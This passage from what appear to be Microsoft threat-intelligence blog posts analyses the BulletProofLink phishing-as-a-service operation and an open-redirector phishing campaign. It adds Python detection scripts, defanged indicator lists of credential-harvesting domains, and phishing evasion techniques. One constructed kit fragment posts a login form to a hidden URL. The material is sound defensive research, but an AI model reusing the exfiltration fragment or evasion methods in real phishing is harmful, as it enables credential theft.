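    "99012345[.]ujsd[.]iotryfuty[.]com",     # constructed, same shape
    # constructed benign hosts: many subdomains, but named rather than generated
    "www.example.com", "mail.example.com", "vpn.example.com",
    "sso.example.com", "cdn.example.com", "docs.example.com",
]


if __name__ == "__main__":
    for finding in infinite_subdomain_candidates(SAMPLE_HOSTS):
        print(finding)
```

Only `ujsd.iotryfuty.com` is reported: `example.com` has just as many distinct subdomains, but none of its labels look generated, so a legitimately large DNS zone is not flagged. In practice the ratio threshold is what separates wildcard abuse from a busy but ordinary zone, and the parent domain reported here is what a block or an exact-match rule should be written against.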

The phishing campaign also impersonated (albeit poorly) the Microsoft logo and branding. The impersonation technique used solid colors for the logo, which may have been done intentionally to bypass detection of the Microsoft logo’s four distinct colors. It is worth noting that later iterations of the campaign have switched to using the four colors in the Microsoft logo.

Screenshot of recent lure used in a BulletProofLink campaign

Figure 10. Phishing lure from a recent credential phishing campaign

These messages also used a technique called zero-point font, which pads the HTML of the message with characters that render as invisible to the user, to obfuscate the email body and attempt to evade detection. This technique is increasingly used by phishers to evade detection.

Screenshot of email and HTML code showing zero-point font technique

Figure 11. HTML showing zero-point font date stuffing in an email

We found that the phishing URL in the email contained Base64-encoded victim information along with an attacker-owned site where the user is meant to be redirected. In this campaign, a single base domain was used for the infinite subdomain technique to initiate the redirects for the campaign, which leveraged multiple secondary sites over several weeks.

Screenshot of encoded URLs and the decoded URL

Figure 12. The format and an example of the phishing URL, which when decoded redirects to the compromised site.
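Both points above, the infinite subdomain technique and the per-recipient URL carrying Base64-encoded victim data, can be turned into a check over URL telemetry: collapse every host to the domain that actually had to be bought or compromised, count how many distinct subdomains hang off it, and try to decode the payload each URL carries. The following is an added example, not code from the original post. The exact URL layout the post's campaign used is not reproduced here; the layout parsed below (a random subdomain and a `data` query parameter holding Base64 of `<recipient>|<redirect target>`) is an assumption made for the example, and the suffix table is a deliberately small stand-in for a real public-suffix list.

```python
"""Spot infinite-subdomain abuse and unpack per-recipient URL payloads.

Added illustration, not code from the original post. The URL layout it parses
(random subdomain, then a "data" query parameter carrying base64 of
"<recipient>|<redirect target>") is an assumption made for the example; a real
kit's encoding must be taken from the captured URLs.
"""
import base64
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Small stand-in for a public-suffix list; enough for the sample hosts below.
SECOND_LEVEL_SUFFIXES = {"co.uk", "com.au", "com.mx", "co.jp", "com.br"}


def registrable_domain(host):
    """Return the part of a host that had to be bought or compromised."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in SECOND_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def decode_victim_blob(blob):
    """Decode the assumed '<email>|<redirect>' payload; None if it is not one."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        raw = base64.urlsafe_b64decode(padded).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if "|" not in raw:
        return None
    email, redirect = raw.split("|", 1)
    return {"email": email, "redirect": redirect}


def analyze_urls(urls, subdomain_threshold=3):
    """Count distinct subdomains per base domain and decode any victim blobs."""
    subs = defaultdict(set)
    decoded = []
    for url in urls:
        parsed = urlparse(url)
        host = parsed.hostname or ""
        base = registrable_domain(host)
        sub = host[: -len(base)].rstrip(".") if host.endswith(base) else ""
        subs[base].add(sub)
        blob = parse_qs(parsed.query).get("data", [""])[0]
        info = decode_victim_blob(blob)
        if info:
            info["base_domain"] = base
            decoded.append(info)
    return {
        "subdomains_per_base": {b: len(s) for b, s in subs.items()},
        "flagged_bases": sorted(b for b, s in subs.items() if len(s) >= subdomain_threshold),
        "decoded": decoded,
    }


def _sample_url(sub, email, redirect):
    """Build one constructed lure URL in the assumed layout (sample data only)."""
    payload = base64.urlsafe_b64encode(f"{email}|{redirect}".encode()).decode().rstrip("=")
    return f"https://{sub}.compromised-example.com/?data={payload}"


# Constructed telemetry: three lures on one base domain plus a benign newsletter link.
SAMPLE_URLS = [
    _sample_url("k3j9x", "alice@example.invalid", "https://redirect-one.example/"),
    _sample_url("p0q7m", "bob@example.invalid", "https://redirect-one.example/"),
    _sample_url("z2w5c", "carol@example.invalid", "https://redirect-two.example/"),
    "https://www.example.org/?data=notbase64",
]

if __name__ == "__main__":
    print(analyze_urls(SAMPLE_URLS))
```

Keying the count on the registrable domain rather than the full host is the whole point: exact-match blocklists see three unrelated hosts, while this view sees one compromised zone serving three recipients. The decoded redirect targets give the list of secondary sites to block next.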

The compromised site redirected to a second domain that hosted the phishing page, which mimicked the Outlook sign-in screen and is generated for each user-specific URL. We found that the page is generated for any number of email addresses entered into the URI, and had no checking mechanisms to guarantee that it wasn’t already used or was related to a live phishing email.

There can be one or more locations to which credentials are sent, but the page employed a few obfuscation techniques to obscure these locations. One attempt to obfuscate the password processing site’s location was by using a function that decodes the location based on calling back to an array of numbers and letters:

Screenshot of a function that decodes the location based on calling back to an array of numbers and letters

We reversed this in Python and found the site that the credentials were being sent to: hxxps://webpicture[.]cc/email-list/finish-unv2[.]php. The pattern “email-list/finish-unv2.php” came in one of these variations: finish-unv2[.]php, finish-unv22[.]php, or finish[.]php. These variations typically used the term “email-list” as well as another file path segment referencing a particular phishing page template, such as OneDrive or SharePoint.

Occasionally, credentials were sent to multiple locations, called from a separate function, including some that could be owned by the purchasing party rather than the operator. This could be a legacy artifact left in final templates, or an instance of double theft.

Screenshot showing patterns of final site URL

Figure 13. The final site’s format comes in either of these pattern variations
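The reversing step described above, recovering the password-processing location from a decoder that indexes into a character table, and the `email-list/.../finish*.php` path shape, can be captured in a small analysis script. The following is an added example and not the team's actual script: the kit fragment it parses is constructed, its obfuscation scheme (a character string plus an array of indexes) is an assumption standing in for whatever the real kit used, and the host `x.invalid` is a placeholder.

```python
"""Recover a phishing kit's credential-processing URL from index-array obfuscation.

Added illustration, not the team's actual script: the kit snippet below is
constructed, and its scheme (a character table plus an array of indexes into it)
is an assumption standing in for whatever the real kit used.
"""
import re

# Constructed fragment in the style of a page-side JavaScript kit (sample only).
SAMPLE_KIT_JS = r'''
var _k = "abcdefghijklmnopqrstuvwxyz0123456789:/.-_";
var _i = [7,19,19,15,18,36,37,37,23,38,8,13,21,0,11,8,3,37,4,12,0,8,11,39,11,8,18,19,37,5,8,13,8,18,7,39,20,13,21,28,38,15,7,15];
function _d(){var s="";for(var j=0;j<_i.length;j++){s+=_k.charAt(_i[j]);}return s;}
$.post(_d(), $("#login").serialize());
'''

# The path shape the post reports for BulletProofLink processors:
# .../email-list/[template segments]/finish.php | finish-unv2.php | finish-unv22.php
PROCESSOR_PATH = re.compile(r"/email-list/(?:[^/\s\"']+/)*(finish(?:-unv22?)?\.php)")

CHARSET_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"\s*;')
INDEXES_RE = re.compile(r"var\s+(\w+)\s*=\s*\[([\d,\s]+)\]\s*;")


def decode_index_array(charset, indexes):
    """Rebuild the string the kit's decoder would return."""
    return "".join(charset[i] for i in indexes if 0 <= i < len(charset))


def find_processor_urls(js):
    """Decode every (charset, index array) pair and keep the ones that look like processors."""
    charsets = {name: value for name, value in CHARSET_RE.findall(js)}
    arrays = {name: [int(n) for n in nums.replace(" ", "").split(",") if n]
              for name, nums in INDEXES_RE.findall(js)}
    hits = []
    for cs in charsets.values():
        for idx in arrays.values():
            candidate = decode_index_array(cs, idx)
            m = PROCESSOR_PATH.search(candidate)
            if m:
                hits.append({"url": candidate, "variant": m.group(1)})
    return hits


if __name__ == "__main__":
    for hit in find_processor_urls(SAMPLE_KIT_JS):
        print(hit)
```

Trying every table against every array is deliberate: kits that ship several decoders, or a second exfiltration target in a separate function as described above, surface as additional hits rather than being missed. `PROCESSOR_PATH` also works directly on proxy or sandbox logs when the page-side code is not available.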

Analyzing these patterns led us to an extensive list of password-capturing URIs detailed in an OSINT Fans blog post about the BulletProofLink phishing service operators. We noticed that they listed patterns similar to the ones we had just observed, enabling us to find the various templates BulletProofLink used, including the phishing email with the fake Microsoft logo discussed earlier.

One of the patterns we noted is that many of the password-processing domains used in the campaigns directly had associated email addresses with “Anthrax”, “BulletProofLink”, “BulletProftLink” or other terms in the certificate registration. The email addresses themselves were not listed identically on every certificate, and were also tied to domains not used exclusively for password-processing, as noted in additional reporting by OSINT Fans.

From then on, we drew even more similarities between the landing pages seen in the infinite subdomain surge campaign we were tracking and the existing in-depth research on the adversaries behind the BulletProofLink operations.

This process ultimately led us to track and expand on the same resources referenced in the OSINT Fans research, as we uncovered even more information about the long-running and large-scale phishing service BulletProofLink. Furthermore, we were able to uncover previous and current password-processing sites in use by the operator, as well as large segments of infrastructure hosted on legitimate hosting sites for this operation’s other components.

“Double theft” as a PhaaS monetization effort

The PhaaS working model as we’ve described it thus far is reminiscent of the ransomware-as-a-service (RaaS) model, which involves double extortion. The extortion method used in ransomware generally involves attackers exfiltrating and posting data publicly, in addition to encrypting them on compromised devices, to put pressure on organizations to pay the ransom. This lets attackers gain multiple ways to assure payment, while the released data can then be weaponized in future attacks by other operators. In a RaaS scenario, the ransomware operator has no obligation to delete the stolen data even if the ransom is already paid.

We have observed this same workflow in the economy of stolen credentials in phishing-as-a-service. With phishing kits, it is trivial for operators to include a secondary location for credentials to be sent to and hope that the purchaser of the phish kit does not alter the code to remove it. This is true for the BulletProofLink phishing kit, and in cases where the attackers using the service received credentials and logs at the end of a week instead of conducting campaigns themselves, the PhaaS operator maintained control of all credentials they resell.

In both ransomware and phishing, the operators supplying resources to facilitate attacks maximize monetization by assuring stolen data, access, and credentials are put to use in as many ways as possible. Additionally, victims’ credentials are also likely to end up in the underground economy.

For a relatively simple service, the return on investment offers considerable motivation as far as the email threat landscape goes.

How Microsoft Defender for Office 365 defends against PhaaS-driven phishing attacks

Investigating specific email campaigns allows us to ensure protections against particular attacks as well as similar attacks that use the same techniques, such as the infinite subdomain abuse, brand impersonation, zero-point font obfuscation, and victim-specific URI used in the campaign discussed in this blog. By studying phishing-as-a-service operations, we are able to scale and expand the coverage of these protections to multiple campaigns that use the services of these operations.

In the case of BulletProofLink, our intelligence on the unique phishing kits, phishing services, and other components of phishing attacks allows us to ensure protection against the many phishing campaigns this operation enables. Microsoft Defender for Office 365—which uses machine learning, heuristics, and an advanced detonation technology to analyze emails, attachments, URLs, and landing pages in real time—recognizes the BulletProofLink phishing kit that serves the false sign-in pages and detects the associated emails and URLs.

In addition, based on our research into BulletProofLink and other PhaaS operations, we observed that numerous phishing kits leverage the code and behaviors of existing kits, such as those sold by BulletProofLink. Any kit that attempts to leverage similar techniques, or stitch together code from multiple kits can similarly be detected and remediated before the user receives the email or engages with the content.

With Microsoft 365 Defender, we’re able to further expand that protection, for example, by blocking phishing websites and other malicious URLs and domains in the browser through Microsoft Defender SmartScreen, as well as by detecting suspicious and malicious behavior on endpoints. Advanced hunting capabilities allow customers to search through key metadata fields on mailflow for the indicators listed in this blog and other anomalies. Email threat data is correlated with signals from endpoints and other domains, providing even richer intelligence and expanding investigation capabilities.

To build resilience against phishing attacks in general, organizations can use anti-phishing policies to enable mailbox intelligence settings, as well as configure impersonation protection settings for specific messages and sender domains. Enabling SafeLinks ensures real-time protection by scanning at time of delivery and at time of click.

In addition to taking full advantage of the tools available in Microsoft Defender for Office 365, administrators can further strengthen defenses against the threat of phishing by securing the Azure AD identity infrastructure. We strongly recommend enabling multifactor authentication and blocking sign-in attempts from legacy authentication.

Learn how you can stop credential phishing and other email threats through comprehensive, industry-leading protection with Microsoft Defender for Office 365.

 

Microsoft 365 Defender Threat Intelligence Team

 

Indicators of compromise

Password-processing URLs

  • hxxps://apidatacss[.]com/finish-unv22[.]php
  • hxxps://ses-smtp[.]com/email-list/office19999999/finish[.]php
  • hxxps://ses-smtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://ses-smtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://smtpro101[.]com/email-list/onedrive25/finish[.]php
  • hxxps://smtpro101[.]com/email-list/office19999999/finish[.]php
  • hxxps://plutosmto[.]com/email-list/office365nw/finish[.]php
  • hxxps://smtptemp[.]site/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://smtptemp[.]site/email-list/office365nw/finish-unv22[.]php
  • hxxps://apidatacss[.]com/finish-unv22[.]php
  • hxxps://smtptemp.site/email-list/otlk55/finish[.]php
  • hxxps://smtptemp.site/email-list/onedrive25/finish[.]php
  • hxxps://plutosmto[.]com/email-list/kumar/finish[.]php
  • hxxps://laptopdata.xyz/email-list/office365nw/finish[.]php
  • hxxps://jupitersmt[.]com/email-list/office365nw/finish[.]php
  • hxxps://plutosmto[.]com/email-list/onedrive25/finish[.]php
  • hxxps://plutosmto[.]com/email-list/sharepointbuisness/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://jupitersmt[.]com/email-list/otlk/finish[.]php
  • hxxps://earthsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://earthsmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/defaultcustomers/johnphilips002021/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/universalmail/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/otlk/finish[.]php
  • hxxps://moneysmtp[.]com/hxxp://moneysmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://feesmtp[.]com/email-list/office365rd40/finish[.]php
  • hxxps://feesmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://Failedghostsmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://bomohsmtp[.]com/email-list/office365-21/finish[.]php
  • hxxps://bomohsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://foxsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://dasmtp[.]com/email-list/dropboxoffice1/finish[.]php
  • hxxps://rosmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/adobe20/finish[.]php
  • hxxps://josmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com:443/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://winsmtp[.]com/email-list/excel/finish[.]php
  • hxxps://linuxsmtp[.]com/email-list/adobe20/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/office1/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/onedrive23/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/excel5/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/adobe3/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/office1/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://panelsmtp[.]com/email-list/onedrive-ar/finish[.]php
  • hxxps://mexsmtp[.]com/email-list/onedrive23/finish[.]php?phishing-processor
  • hxxps://racksmtp[.]com/email-list/domain-au1/finish[.]php
  • hxxps://racksmtp[.]com/email-list/finish[.]php
  • hxxps://racksmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://mainsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php?i-am-a-phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php?this-is-a-phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/office1/finish[.]php
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://apiserverdata1[.]com/email-list/office1/finish[.]php
  • hxxps://webpicture.cc/email-list/excel/finish[.]php
  • hxxps://webpicture.cc/email-list/office1/finish[.]php?this-is-a=phishing-processor
  • hxxps://valvadi101[.]com/email-list/office1/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://foxsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://bomohsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://rosmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://linuxsmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://voksmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://webpicture.cc/email-list/finish-unv2[.]php
  • hxxps://Faileduebpicture.cc/email-list/finish-unv2[.]php
  • hxxps://Failedsendapidata[.]com/email-list/finish-unv2[.]php
  • hxxps://webpicture.cc/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://webpicture.cc/email-list/finish-unv2.ph
  • hxxps://apiserverdata1[.]com/email-list/finish-unv2[.]php
  • hxxps://sendapidata[.]com/email-list/finish-unv2[.]php

Password-processing domains:

  • hxxps://apidatacss[.]com
  • hxxps://apiserverdata1[.]com
  • hxxps://baller[.]top
  • hxxps://datacenter01.us
  • hxxps://f1smtp[.]com
  • hxxps://ghostsmtp[.]com
  • hxxps://gpxsmtp[.]com
  • hxxps://gurl101[.]services
  • hxxps://hostprivate[.]us
  • hxxps://josmtp[.]com
  • hxxps://link101[.]bid
  • hxxps://linuxsmtp[.]com
  • hxxps://migration101[.]us
  • hxxps://panelsmtp[.]com
  • hxxps://racksmtp[.]com
  • hxxps://rosmtp[.]com
  • hxxps://rxasmtp[.]com
  • hxxps://thegreenmy87[.]com
  • hxxps://vitme[.]bid
  • hxxps://voksmtp[.]com
  • hxxps://winsmtp[.]com
  • hxxps://trasactionsmtp[.]com
  • hxxps://moneysmtp[.]com
  • hxxps://foxsmtp[.]com
  • hxxps://bomohsmtp[.]com
  • hxxps://webpicture[.]cc
  • hxxps://Faileduebpicture[.]cc
  • hxxps://Failedsendapidata[.]com
  • hxxps://prvtsmtp[.]com
  • hxxps://sendapidata[.]com
  • hxxps://smtptemp.site
  • hxxps://plutosmto[.]com
  • hxxps://laptopdata[.]xyz
  • hxxps://jupitersmt[.]com
  • hxxps://earthsmtp[.]com
  • hxxps://feesmtp[.]com
  • hxxps://Failedghostsmtp[.]com
  • hxxps://dasmtp[.]com
  • hxxps://mexsmtp[.]com
  • hxxps://mainsmtp[.]com
  • hxxps://valvadi101[.]com
  • hxxps://ses-smtp[.]com

 

The post Catching the big fish: Analyzing a large-scale phishing-as-a-service operation appeared first on Microsoft Security Blog.

Widespread credential phishing campaign abuses open redirector links

August 26th, 2021 No comments

Microsoft has been actively tracking a widespread credential phishing campaign using open redirector links. Attackers combine these links with social engineering baits that impersonate well-known productivity tools and services to lure users into clicking. Doing so leads to a series of redirections—including a CAPTCHA verification page that adds a sense of legitimacy and attempts to evade some automated analysis systems—before taking the user to a fake sign-in page. This ultimately leads to credential compromise, which opens the user and their organization to other attacks.

The use of open redirects in email communications is common among organizations for various reasons. For example, sales and marketing campaigns use this feature to lead customers to a desired landing web page and track click rates and other metrics. However, attackers could abuse open redirects to link to a URL in a trusted domain and embed the eventual final malicious URL as a parameter. Such abuse may prevent users and security solutions from quickly recognizing possible malicious intent.

For instance, users trained to hover on links and inspect for malicious artifacts in emails may still see a domain they trust and thus click it. Likewise, traditional email gateway solutions may inadvertently allow emails from this campaign to pass through because their settings have been trained to recognize the primary URL without necessarily checking the malicious parameters hiding in plain sight.

Diagram showing attack chain of phishing campaigns that use open redirect links

Figure 1. Attack chain for the open redirect phishing campaign

This phishing campaign is also notable for its use of a wide variety of domains for its sender infrastructure—another attempt to evade detection. These include free email domains from numerous country code top-level domains (ccTLDs), compromised legitimate domains, and attacker-owned domain generated algorithm (DGA) domains. As of this writing, we have observed at least 350 unique phishing domains used for this campaign. This not only shows the scale with which this attack is being conducted, but it also demonstrates how much the attackers are investing in it, indicating potentially significant payoffs.

Today’s email threats rely on three things to be effective: a convincing social engineering lure, a well-crafted detection evasion technique, and a durable infrastructure to carry out an attack. This phishing campaign exemplifies the perfect storm of these elements in its attempt to steal credentials and ultimately infiltrate a network. And given that 91% of all cyberattacks originate with email, organizations must have a security solution that provides multilayered defense against these types of attacks.

Microsoft Defender for Office 365 detects these emails and prevents them from being delivered to user inboxes using multiple layers of dynamic protection technologies, including a built-in sandbox that examines and detonates all the open redirector links in the messages, even in cases where the landing page requires CAPTCHA verification. This ensures that even the embedded malicious URLs are detected and blocked. Microsoft Defender for Office 365 is backed by Microsoft experts who enrich the threat intelligence that feeds into our solutions through expert monitoring of email campaigns.

Attack analysis: Credential phishing via open redirector links

Credential phishing emails represent an extremely prevalent way for threat actors to gain a foothold in a network. The use of open redirects from legitimate domains is far from new, and actors continue to abuse its ability to overcome common precautions.

Phishing continues to grow as a dominant attack vector with the goal of harvesting user credentials. From our 2020 Digital Defense Report, we blocked over 13 billion malicious and suspicious mails in the previous year, with more than 1 billion of those emails classified as URL-based phishing threats.

In this campaign, we noticed that the emails seemed to follow a general pattern that displayed all the email content in a box with a large button that led to credential harvesting pages when clicked. The subject lines for the emails varied depending on the tool they impersonated. In general, we saw that the subject lines contained the recipient’s domain and a timestamp as shown in the examples below:

  • [Recipient username] 1 New Notification
  • Report Status for [Recipient Domain Name] at [Date and Time]
  • Zoom Meeting for [Recipient Domain Name] at [Date and Time]
  • Status for [Recipient Domain Name] at [Date and Time]
  • Password Notification for [Recipient Domain Name] at [Date and Time]
  • [Recipient username] eNotification

Screenshot of email that uses open redirect link

Figure 2. Sample phishing email masquerading as an Office 365 notification

Once recipients hover their cursor over the link or button in the email, they are shown the full URL. However, since the actors set up open redirect links using a legitimate service, users see a legitimate domain name that is likely associated with a company they know and trust. We believe that attackers abuse this open and reputable platform to attempt evading detection while redirecting potential victims to phishing sites.

Screenshot of email showing open redirector link when mouse is hovered the link in the email

Figure 3. Hover tip showing an open redirect link with a legitimate domain and phishing link in the URL parameters

The final domains used in the campaigns observed during this period mostly follow a specific domain-generation algorithm (DGA) pattern and use .xyz and .club TLDs. The “Re-view invitation” button in Figure 3 points to a URL with a trusted domain followed by parameters, with the actor-controlled domain (c-hi[.]xyz) hidden in plain sight.

Figure 4. The actor-controlled domain uses a DGA pattern and a .XYZ top-level domain

In August, we detected a fresh spam run from this campaign that used a slightly updated Microsoft-spoofing lure and redirect URL but leveraged the same infrastructure and redirection chain.

Figure 5. Sample phishing email from a recent spam run from this phishing campaign

These crafted URLs are made possible by open redirection services currently in use by legitimate organizations. Such redirection services typically allow organizations to send out campaign emails with links that redirect to secondary domains from their own domains. For example, a hotel might use open redirects to take email recipients to a third-party booking website, while still using their primary domain in links embedded in their campaign emails.

Attackers abuse this functionality by redirecting to their own malicious infrastructure, while still maintaining the legitimate domain in the full URL. The organizations whose open redirects are being abused are possibly unaware that this is even occurring.

Redirecting to phishing pages

Users who click one of the crafted redirect links are sent to a page on attacker-owned infrastructure. These pages use Google reCAPTCHA services, possibly to evade attempts at dynamically scanning and checking the contents of the page, preventing some analysis systems from advancing to the actual phishing page.

Screenshot of landing page with CAPTCHA challenge

Figure 6. reCAPTCHA service used by phishing page

Upon completion of the CAPTCHA verification, the user is shown a site that impersonates a legitimate service, such as Microsoft Office 365, which asks the user for their password. The site is prepopulated with the recipient’s email address to add legitimacy to the request. This technique leverages familiar single sign-on (SSO) behavior to trick users into keying in corporate credentials or other credentials associated with the email address.

To do this, attackers send unique URLs to each recipient with PHP parameters that cause tailored information to render in the phishing page. In some instances, phishing pages are specially crafted to include company logos and other branding tied to the recipient’s domain.

Screenshot of phishing page

Figure 7. Fake sign-in page prefilled with the recipient email address alongside a fake error message prompting users to re-enter their passwords

If the user enters their password, the page refreshes and displays an error message stating that the page timed out or the password was incorrect and that they must enter their password again. This is likely done to get the user to enter their password twice, allowing attackers to ensure they obtain the correct password.

Once the user enters their password a second time, the page directs to a legitimate Sophos website that claims the email message has been released. This adds another layer of false legitimacy to the phishing campaign.

Screenshot of legitimate website that phishing page redirects to

Figure 8. Legitimate Sophos page displayed after users re-enter their passwords

Tracking attacker-controlled domains

Some of the domains used in this campaign include the following:

  • c-tl[.]xyz
  • a-cl[.]xyz
  • j-on[.]xyz
  • p-at[.]club
  • i-at[.]club
  • f-io[.]online

For the observed campaigns, the sender infrastructure was fairly unique and notable as the actors used a wide variety of sender domains, with most of the domains having at least one of the following characteristics:

  • Free email domains
  • Compromised legitimate domains
  • Domains ending in .co.jp
  • Attacker-owned DGA domains

Many of the final domains hosting the phishing pages follow a specific DGA pattern:

  • [letter]-[letter][letter].xyz
  • [letter]-[letter][letter].club

The free email domains span a wide variety of ccTLDs, such as:

  • de
  • com.mx
  • com.au
  • ca

The attacker-owned DGA domains follow a few distinct patterns, including:

  • [word or string of characters]-[word][number], incrementing by one, for example: masihtidur-shoes08[.]com
  • [number][word or string of characters]-[number], incrementing by one, for example: 23moesian-17[.]com
  • [word][word][number], incrementing by one, for example: notoficationdeliveryamazon10[.]com
  • [word or letters][number]-[number], incrementing by one, for example: dak12shub-3[.]com

While these are the most prevalent patterns observed by Microsoft security researchers, over 350 unique domains have been observed during these campaigns.
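The four sender-domain patterns listed above, and the note that their trailing numbers increment by one, lend themselves to a small classifier that reads a domain list and groups domains by their numbered stem. The following is an added example, not code from the original post: the four regular expressions are my reading of the patterns as the post describes them, and the sample list mixes indicators taken from the post's own list with two constructed benign domains.

```python
"""Classify sender domains against the DGA shapes listed above and find numbered runs.

Added illustration, not code from the original post. The four regexes are my
reading of the patterns the post describes; the sample domains are taken from the
post's own indicator list plus two constructed benign ones.
"""
import re
from collections import defaultdict

# Shape names follow the bullet list above. Order matters: the more specific
# shapes are tested first so "dak12shub-3" is not swallowed by a generic one.
DGA_SHAPES = [
    ("[number][string]-[number]", re.compile(r"^\d+[a-z]+-\d+$")),         # 23moesian-17
    ("[letters][number]-[number]", re.compile(r"^[a-z]+\d+[a-z]*-\d+$")),  # dak12shub-3
    ("[string]-[word][number]", re.compile(r"^[a-z0-9]+-[a-z]+\d+$")),     # masihtidur-shoes08
    ("[word][word][number]", re.compile(r"^[a-z]+\d+$")),                  # notoficationdeliveryamazon10
]
TRAILING_NUMBER = re.compile(r"^(.*?)(\d+)$")


def refang(domain):
    """Turn a defanged indicator such as 'a-b[.]com' back into a hostname."""
    return domain.strip().lower().replace("[.]", ".").replace("(.)", ".")


def classify(domain):
    """Return the DGA shape name for the leftmost label, or None if none matches."""
    label = refang(domain).split(".")[0]
    for name, rx in DGA_SHAPES:
        if rx.match(label):
            return name
    return None


def numbered_clusters(domains):
    """Group domains by label stem (trailing digits removed) and list the numbers seen."""
    clusters = defaultdict(list)
    for d in domains:
        label, _, tld = refang(d).partition(".")
        m = TRAILING_NUMBER.match(label)
        if m:
            clusters[f"{m.group(1)}*.{tld}"].append(int(m.group(2)))
    return {stem: sorted(nums) for stem, nums in clusters.items()}


def report(domains, min_cluster=3):
    """Summarise shape counts and stems that look like incrementing registrations."""
    by_shape = defaultdict(int)
    for d in domains:
        by_shape[classify(d) or "unmatched"] += 1
    runs = {}
    for stem, nums in numbered_clusters(domains).items():
        if len(nums) >= min_cluster:
            # longest run of consecutive numbers: the "incrementing by one" signal
            best = cur = 1
            for a, b in zip(nums, nums[1:]):
                cur = cur + 1 if b == a + 1 else 1
                best = max(best, cur)
            runs[stem] = {"count": len(nums), "longest_consecutive_run": best}
    return {"by_shape": dict(by_shape), "suspicious_stems": runs}


# Indicators from the post's list, plus two constructed benign domains.
SAMPLE_DOMAINS = [
    "masihtidur-shoes08[.]com", "masihtidur-shoes07[.]com", "masihtidur-shoes04[.]com",
    "masihtidur-shoes02[.]com", "masihtidur-shoes01[.]com",
    "23moesian-17[.]com", "23moesian-10[.]com", "23moesian-11[.]com",
    "notoficationdeliveryamazon10[.]com", "notoficationdeliveryamazon1[.]com",
    "dak12shub-3[.]com",
    "example-mail.com", "newsletter.example.org",
]

if __name__ == "__main__":
    print(report(SAMPLE_DOMAINS))
```

The shape regexes alone will match some legitimate domains, so the stem clustering is the more useful output: a stem with several registrations whose numbers sit in a tight range is what the "incrementing by one" observation looks like in data, and it generalises to stems the regexes were never written for.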

How Microsoft Defender for Office 365 protects against modern email threats

The abuse of open redirectors represents an ongoing threat that Microsoft experts constantly monitor, along with other threat trends and attacker techniques used in attacks today. Microsoft’s breadth of visibility into threats combined with our deep understanding of how attackers operate will continue to inform the advanced protection delivered by Microsoft Defender for Office 365 against email-based attacks.

For mitigations against the abuse of open redirector links via known third-party platforms or services, users are advised to follow the recommended best practices of their service providers, such as updating to the latest software version, if applicable, to prevent their domains from being abused in future phishing attempts.

Microsoft Defender for Office 365 protects customers from this threat by leveraging its deep visibility into email threats and advanced detection technologies powered by AI and machine learning. We strongly recommend that organizations configure recommended settings in Microsoft Defender for Office 365, such as applying anti-phishing, Safe Links, and Safe Attachments policies. We also recommend installing the Report Message add-in for Outlook to enable users to report suspicious messages to their security teams and optionally to Microsoft.

Attack simulation lets organizations run realistic, yet safe, simulated phishing and password attack campaigns in their own environment. These simulated attacks can help identify vulnerable users before a real attack makes a real impact.

Investigation capabilities in Microsoft 365 Defender allow organizations to respond to phishing and other email-based attacks. Microsoft 365 Defender correlates signals from emails and other domains to deliver coordinated defense. Microsoft Defender for Endpoint blocks malicious files and other malware, as well as malicious behavior that results from initial access via email. Microsoft Defender SmartScreen integrates with Microsoft Edge to block malicious websites, including phishing sites, scam sites, and other malicious sites, while Network protection blocks connections to malicious domains and IP addresses.

Learn how you can stop credential phishing and other email threats through comprehensive, industry-leading protection with Microsoft Defender for Office 365.

 

